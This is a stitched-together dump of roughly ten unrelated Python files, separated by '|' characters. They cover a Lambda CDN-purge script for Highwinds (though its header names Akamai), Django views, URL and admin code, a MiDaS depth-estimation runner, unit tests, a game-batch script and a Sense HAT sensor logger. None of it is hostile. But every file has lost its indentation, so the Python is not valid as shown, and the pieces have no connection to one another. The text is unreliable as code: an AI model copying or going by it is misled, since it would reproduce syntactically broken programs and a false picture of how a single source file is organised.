# (c) 2017 Shalom Carmel shalom@globaldots.com
#
# purge-akamai version 1
# https://api.ccu.akamai.com/ccu/v2/docs/
# Changelog
# version 1: Initial version
from __future__ import print_function
import os
import json
import logging
from highwindsclient import Highwinds
import config_highwinds as config
# Lambda has some special environment variables
isLambda = True if "LAMBDA_RUNTIME_DIR" in os.environ else False
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# These will only by loaded during Lambda cold start. Should this code be placed in the main function instead?
if isLambda:
password=os.environ.get('password')
user=os.environ.get('user')
base_url = os.environ.get('base_url')
else:
password=config.password
user=config.user
base_url = config.base_url
assert password,"Error: missing API password"
assert user, "Error: missing API user"
assert base_url, "Error: missing base URL"
def construct_url(base, bucket, key):
return '{}/{}'.format(base, key)
def main(event, context=None):
output=[]
url_list = []
# accumulate a batch of URLs to purge
for record in event['Records']:
bucket = record['s3']['bucket']['name']
key = record['s3']['object']['key']
credentials = {
'user' : user,
'password' : password
}
highwinds = Highwinds(**credentials )
cdn_url = construct_url(base_url, bucket, key)
url_list.append(cdn_url)
purge_response = highwinds.purge(url_list)
purge_response_http_status = highwinds.http_status
cdnEvent = {
"url" : url_list,
"highwinds_response" : {
"status" : purge_response_http_status ,
"response" : purge_response
}
}
if purge_response_http_status != 200 or 'error' in highwinds.http_content.lower():
logger.error('HTTP status: {} ; {}'.format(purge_response_http_status, json.dumps(cdnEvent) ) )
else:
logger.info(json.dumps(cdnEvent))
output.append( cdnEvent )
return(output)
if __name__ == '__main__':
event = {
"Records": [
{
"eventVersion": "2.0",
"eventTime": "1970-01-01T00:00:00.000Z",
"requestParameters": {
"sourceIPAddress": "127.0.0.1"
},
"s3": {
"configurationId": "testConfigRule",
"object": {
"eTag": "0123456789abcdef0123456789abcdef",
"sequencer": "0A1B2C3D4E5F678901",
"key": "HappyFace.jpg",
"size": 1024
},
"bucket": {
"arn": "arn:aws:s3:::mybucket",
"name": "mybucket",
"ownerIdentity": {
"principalId": "EXAMPLE"
}
},
"s3SchemaVersion": "1.0"
},
"responseElements": {
"x-amz-id-2": "EXAMPLE123/5678abcdefghijklambdaisawesome/mnopqrstuvwxyzABCDEFGH",
"x-amz-request-id": "EXAMPLE123456789"
},
"awsRegion": "us-east-1",
"eventName": "ObjectCreated:Put",
"userIdentity": {
"principalId": "EXAMPLE"
},
"eventSource": "aws:s3"
}
]
}
print( main(event) ) |
import os
import shutil
from unittest import TestCase
from cookiejar.channel import Channel
from cookiejar.settings import SettingsReader
class ChannelTests(TestCase):
def setUp(self):
self.current_dir = os.path.dirname(os.path.abspath(__file__))
self.templates_dir = os.path.join(self.current_dir, 'cookiecutters')
def test_add(self):
config_path = os.path.join(self.current_dir, 'cookiejarrc')
settings = SettingsReader(config_file=config_path)
settings['templates_dir'] = self.templates_dir
index = os.path.join((os.path.dirname(os.path.abspath(__file__))), 'index.1.json')
channel = Channel(settings=settings, index=index)
channel.add("audreyr/pypackage")
destination_path = os.path.join(settings['templates_dir'], 'audreyr', 'pypackage')
self.assertTrue(os.path.exists(destination_path))
destination_path = os.path.join(destination_path, 'cookiecutter.json')
self.assertTrue(os.path.exists(destination_path))
channel.remove("audreyr/pypackage")
destination_path = os.path.join(settings['templates_dir'], 'audreyr', 'pypackage')
self.assertFalse(os.path.exists(destination_path))
def tearDown(self):
shutil.rmtree(self.templates_dir)
|
from django.shortcuts import redirect
from django.contrib.auth.forms import UserCreationForm
from django.views.generic.edit import FormView
from django.http import JsonResponse
from django.contrib.auth import get_user_model, authenticate, login, logout
from django.contrib.auth.mixins import LoginRequiredMixin
from django.views import View
from .forms import LoginForm, MessageForm
from .utils import send_feedback
from .models import Message
import requests
import json
from smtplib import SMTPAuthenticationError
User = get_user_model()
class FeedbackView(LoginRequiredMixin, FormView):
login_url = '/'
template_name = 'accounts/feedback.html'
form_class = MessageForm
def form_valid(self, form):
errors = []
cd = form.cleaned_data
message = Message(sender=cd['sender'], body=cd['body'])
r = requests.get('http://jsonplaceholder.typicode.com/users')
senders = json.loads(r.text)
sender = {}
for s in senders:
if s['email'].lower() == cd['sender'].lower():
sender = s
try:
send_feedback(cd['body'], cd['sender'], sender)
message.status = 'Ok'
message.save()
return JsonResponse({
'success': True,
'message': 'Письмо успешно отправлено'
})
except (SMTPAuthenticationError, User.DoesNotExist) as ex:
template = "An exception of type {0} occurred. Arguments:\n{1!r}"
err = template.format(type(ex).__name__, ex.args)
print(err)
message.status = 'Error'
message.save()
errors.append(
'Не удалось отправить сообщение. Повторите попытку позже'
)
return JsonResponse({
'success': False,
'errors': errors
})
def form_invalid(self, form):
errors = []
for k, v in form.errors.items():
for e in v:
errors.append(e)
return JsonResponse({
'success': False,
'errors': errors
})
class LoginView(FormView):
template_name = 'accounts/login.html'
form_class = LoginForm
def form_valid(self, form):
errors = []
cd = form.cleaned_data
username = cd['username']
password = cd['password']
user = authenticate(username=username, password=password)
if user is not None:
login(self.request, user)
return JsonResponse({'success': True})
else:
errors.append('Введите правильное имя пользователя и пароль')
return JsonResponse({
'success': False,
'errors': errors
})
def form_invalid(self, form):
errors = []
for k, v in form.errors.items():
for e in v:
errors.append(e)
return JsonResponse({
'success': False,
'errors': errors
})
class SignupView(FormView):
template_name = 'accounts/signup.html'
form_class = UserCreationForm
def form_valid(self, form):
cd = form.cleaned_data
user = User(username=cd['username'])
user.set_password(cd['password1'])
user.save()
return JsonResponse({'success': True})
def form_invalid(self, form):
errors = []
for k, v in form.errors.items():
for e in v:
errors.append(e)
return JsonResponse({
'success': False,
'errors': errors
})
class LogoutView(View):
def get(self, request):
logout(request)
return redirect('accounts:login')
|
# -*- encoding: utf-8 -*-
from django.conf.urls import patterns
from django.contrib import admin
from django.core.exceptions import PermissionDenied
from django.shortcuts import redirect, get_object_or_404
from django.utils.translation import ugettext_lazy as _
from django_pages.settings import ADMIN_MEDIA_PREFIX
from .models import MenuItem
class MenuAdmin(admin.ModelAdmin):
fields = ('name', )
list_display = ('name', )
class MenuItemAdmin(admin.ModelAdmin):
fields = (('lang', 'menu', 'menuitem_name'), 'url', 'style')
list_display = (
'menuitem_name',
'lang',
'menu',
'url',
'move',
'position',
'style'
)
list_filter = ('lang', 'menu')
prepopulated_fields = {"url": ("menuitem_name",)}
def move(self, obj):
"""
Returns html with links to move_up and move_down views.
"""
button = u'<a href="%s"><img src="%simg/arrow-%s.png" /> %s</a>'
prefix = ADMIN_MEDIA_PREFIX
link = '%d/move_up/' % obj.pk
html = button % (link, prefix, 'up', _('up')) + " | "
link = '%d/move_down/' % obj.pk
html += button % (link, prefix, 'down', _('down'))
return html
move.allow_tags = True
move.short_description = _('Move')
def get_urls(self):
admin_view = self.admin_site.admin_view
urls = patterns(
'',
(r'^(?P<item_pk>\d+)/move_up/$', admin_view(self.move_up)),
(r'^(?P<item_pk>\d+)/move_down/$', admin_view(self.move_down)),
)
return urls + super(MenuItemAdmin, self).get_urls()
def move_up(self, request, item_pk):
if self.has_change_permission(request):
item = get_object_or_404(MenuItem, pk=item_pk)
item.increase_position()
else:
raise PermissionDenied
return redirect('/admin/menu/menuitem/?o=2.3.-6.-5')
def move_down(self, request, item_pk):
if self.has_change_permission(request):
item = get_object_or_404(MenuItem, pk=item_pk)
item.decrease_position()
else:
raise PermissionDenied
return redirect('/admin/menu/menuitem/?o=2.3.-6.-5')
|
"""Compute depth maps for images in the input folder.
"""
import os
import glob
import torch
import utils
import cv2
import argparse
from torchvision.transforms import Compose
from midas.midas_net import MidasNet
from midas.midas_net_custom import MidasNet_small
from midas.transforms import Resize, NormalizeImage, PrepareForNet
def run(input_path, output_path, model_path, model_type="large", optimize=True):
"""Run MonoDepthNN to compute depth maps.
Args:
input_path (str): path to input folder
output_path (str): path to output folder
model_path (str): path to saved model
"""
print("initialize")
# select device
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print("device: %s" % device)
# load network
if model_type == "large":
model = MidasNet(model_path, non_negative=True)
net_w, net_h = 384, 384
elif model_type == "small":
model = MidasNet_small(model_path, features=64, backbone="efficientnet_lite3", exportable=True, non_negative=True, blocks={'expand': True})
net_w, net_h = 256, 256
else:
print(f"model_type '{model_type}' not implemented, use: --model_type large")
assert False
transform = Compose(
[
Resize(
net_w,
net_h,
resize_target=None,
keep_aspect_ratio=True,
ensure_multiple_of=32,
resize_method="upper_bound",
image_interpolation_method=cv2.INTER_CUBIC,
),
NormalizeImage(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
PrepareForNet(),
]
)
model.eval()
if optimize==True:
rand_example = torch.rand(1, 3, net_h, net_w)
model(rand_example)
traced_script_module = torch.jit.trace(model, rand_example)
model = traced_script_module
if device == torch.device("cuda"):
model = model.to(memory_format=torch.channels_last)
model = model.half()
model.to(device)
# get input
img_names = glob.glob(os.path.join(input_path, "*"))
num_images = len(img_names)
# create output folder
os.makedirs(output_path, exist_ok=True)
print("start processing")
for ind, img_name in enumerate(img_names):
print(" processing {} ({}/{})".format(img_name, ind + 1, num_images))
# input
img = utils.read_image(img_name)
img_input = transform({"image": img})["image"]
# compute
with torch.no_grad():
sample = torch.from_numpy(img_input).to(device).unsqueeze(0)
if optimize==True and device == torch.device("cuda"):
sample = sample.to(memory_format=torch.channels_last)
sample = sample.half()
prediction = model.forward(sample)
prediction = (
torch.nn.functional.interpolate(
prediction.unsqueeze(1),
size=img.shape[:2],
mode="bicubic",
align_corners=False,
)
.squeeze()
.cpu()
.numpy()
)
# output
filename = os.path.join(
output_path, os.path.splitext(os.path.basename(img_name))[0]
)
utils.write_depth(filename, prediction, bits=2)
print("finished")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input_path',
default='input',
help='folder with input images'
)
parser.add_argument('-o', '--output_path',
default='output',
help='folder for output images'
)
parser.add_argument('-m', '--model_weights',
default='model-f6b98070.pt',
help='path to the trained weights of model'
)
parser.add_argument('-t', '--model_type',
default='large',
help='model type: large or small'
)
parser.add_argument('--optimize', dest='optimize', action='store_true')
parser.add_argument('--no-optimize', dest='optimize', action='store_false')
parser.set_defaults(optimize=True)
args = parser.parse_args()
# set torch options
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
# compute depth maps
run(args.input_path, args.output_path, args.model_weights, args.model_type, args.optimize)
|
from django.conf.urls import url
from .views import *
urlpatterns = [
url(r'^home$',home,name='home'),
url(r'^cart$',cart,name='cart'),
url(r'^market$',market,name='market'),
url(r'^market_with_params/(\d+)/(\d+)/(\d+)',market_with_params,name='market_with_params'),
url(r'^mine$',mine,name='mine'),
url(r'^register$',RegisterAPI.as_view(),name='register'),
url(r'^login$',LoginAPI.as_view(),name='login'),
url(r'^confirm/(.*)',confirm),
url(r'^logout$',logout_api,name='logout'),
url(r'^cartapi$',cart_api,name='cart_api'),
url(r'^cart_status$',cart_status_api),
url(r'^select_all_api$',select_all_api),
url(r'^cartitem_api$',cartitem_api),
url(r'^order$',order_api,name='order'),
url(r'^123$',heike),
# url(r'^2048$',yx)
] |
from numerous.engine.system.binding import Binding
from numerous.utils.dict_wrapper import _DictWrapper
from numerous.engine.system.namespace import _ShadowVariableNamespace
from numerous.engine.system.node import Node
class Connector(Node):
"""
Base class for representing connectors. Object that inherited connector can be used as
a connection between items.
Attributes
----------
bindings : dictionary of :class:`Binding`
List of binding that connector have.
"""
def __init__(self, tag, **kw):
self.bindings = _DictWrapper(self.__dict__, Binding)
super(Connector, self).__init__(tag)
def create_binding(self, binding_name):
"""
Creating a new binding inside the connector
Parameters
----------
binding_name : string
name of the new binding
Raises
------
ValueError
If `binding_name` is already registered in this connector.
"""
if binding_name in self.bindings.keys():
raise ValueError('Binding with name {0} is already registered in connector {1}'
.format(binding_name, self.tag))
else:
self.bindings[binding_name] = Connector.create_new_binding(binding_name)
def _create_shadow_namespace(self, param):
self.__update_bindings_namespace(param)
def update_bindings(self, list_of_eq, binding_name):
"""
Updating an existing binding with the equations that are expected to be in the binded items.
Parameters
----------
list_of_eq : list of :class:`numerous.multiphysics.Equation`
List of a `Equation` that are expected to be in binded items.
binding_name: string
Name of a binding to be updated.
"""
for binding in self.bindings:
binding.__dict__[binding_name].add_equations(list_of_eq)
def __update_bindings_namespace(self, param):
for binding in self.bindings:
binding.update_namespace(_ShadowVariableNamespace(self, param, binding))
def get_binded_items(self):
"""
Get items that are binded to the connector.
Returns
-------
items : list
all items that are binded to the connector as one list.
"""
return [
y.binded_item for y in self.bindings
if y.binded_item is not None
]
@staticmethod
def create_new_binding(binding_name):
"""
Creates a new :class:`Binding` without registering it inside the connector.
Parameters
----------
binding_name: string
Name of a binding to be created.
Returns
-------
binding : Binding
new binding with given name.
"""
return Binding(binding_name)
def __setattr__(self, key, value):
if key in self.__dict__:
if isinstance(self.__dict__[key], Binding):
if isinstance(value, Node):
self.__dict__[key].add_binding(value)
object.__setattr__(self, key, value)
|
from utilities.logger import *
def read_last_line():
file = open(Path(Logger.log_path, LogError.error_log_file), "r")
lastline = file.readlines()[-1]
lastline = lastline.strip()
file.close()
return lastline
def test_submission_error_flask():
"""" Ensures that that correct format """
flaskheader = {
"Access-Control-Request-Method": "POST",
"Accept": "application/json",
"Content-Length": "2000",
"Accept-Charset": "utf-8",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0"
}
ErrorAPISubmission("D23478", "Verify failure", ExtraHtmlHeaders(flaskheader)).log_it()
time = get_date_time()
assert read_last_line() == \
f'API_SUB_ERROR, D23478, Verify failure, {time}, Access-Control-Request-Method:POST | Accept:application/json | Content-Length:2000 | Accept-Charset:utf-8 | User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0'
def test_verification_error():
device = "D47848"
details = "NA"
ErrorDeviceVerfication(device, details, None).log_it()
time = get_date_time()
assert read_last_line() == f'API_VER_ERROR, D47848, NA, {time}, NA'
def test_validation_error():
ErrorDataVailidation("D47848", "error message", None).log_it()
time = get_date_time()
assert read_last_line() == f'API_VAL_ERROR, D47848, error message, {time}, NA' |
import os
import sys
os.system("echo " + ">xxx.txt")
for i in range(1,101):
#os.system("java -jar tools/PlayGame.jar maps/map"+str(i)+".txt 1000 1000 log.txt \"python harsha.py\" \"python alex.py\" 2> a.txt")
#~ os.system("java -jar tools/PlayGame.jar maps/map"+str(i)+".txt 1000 1000 log.txt \"python WatchYourStep.py\" \"../CK/MyBot\" 2> a.txt")
os.system("java -jar tools/PlayGame.jar maps/map"+str(i)+".txt 1000 100 log.txt \"python verygood.py\" \"../AD/MyBot\" 2> aa.txt")
os.system("echo "+str(i) + " >>xxx.txt")
os.system("wc -l aa.txt >> xxx.txt")
os.system("grep \"Player \" aa.txt >> xxx.txt")
|
#!/usr/bin/env python3
from sense_hat import SenseHat
import datetime
import time
from logData import Logger
from checkRange import InRange
from makeRemindercsv import Reminder
import sqlite3
class Info:
SAMPLE_FREQUENCY_SECONDS = 3
def getInfo(self):
sense = SenseHat.getSenseHat()
timestamp = datetime.datetime.now().strftime('%d/%m/%Y %I:%M %p')
temperature = sense.get_temperature()
humidity = sense.get_humidity()
if temperature is not None:
temperature = round(temperature, 2)
if humidity is not None:
humidity = round(humidity, 2)
return timestamp, temperature, humidity
def main():
info = Info()
logData = Logger()
check = InRange()
reminder = Reminder()
timestamp, temperature, humidity = info.getInfo()
for _ in range(0, 3):
logData.dataLogger(timestamp, temperature, humidity)
time.sleep(info.SAMPLE_FREQUENCY_SECONDS)
logData.displayData()
reminder.makeReminder()
check.checkConfig(temperature, humidity)
if __name__ == "__main__":
main() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.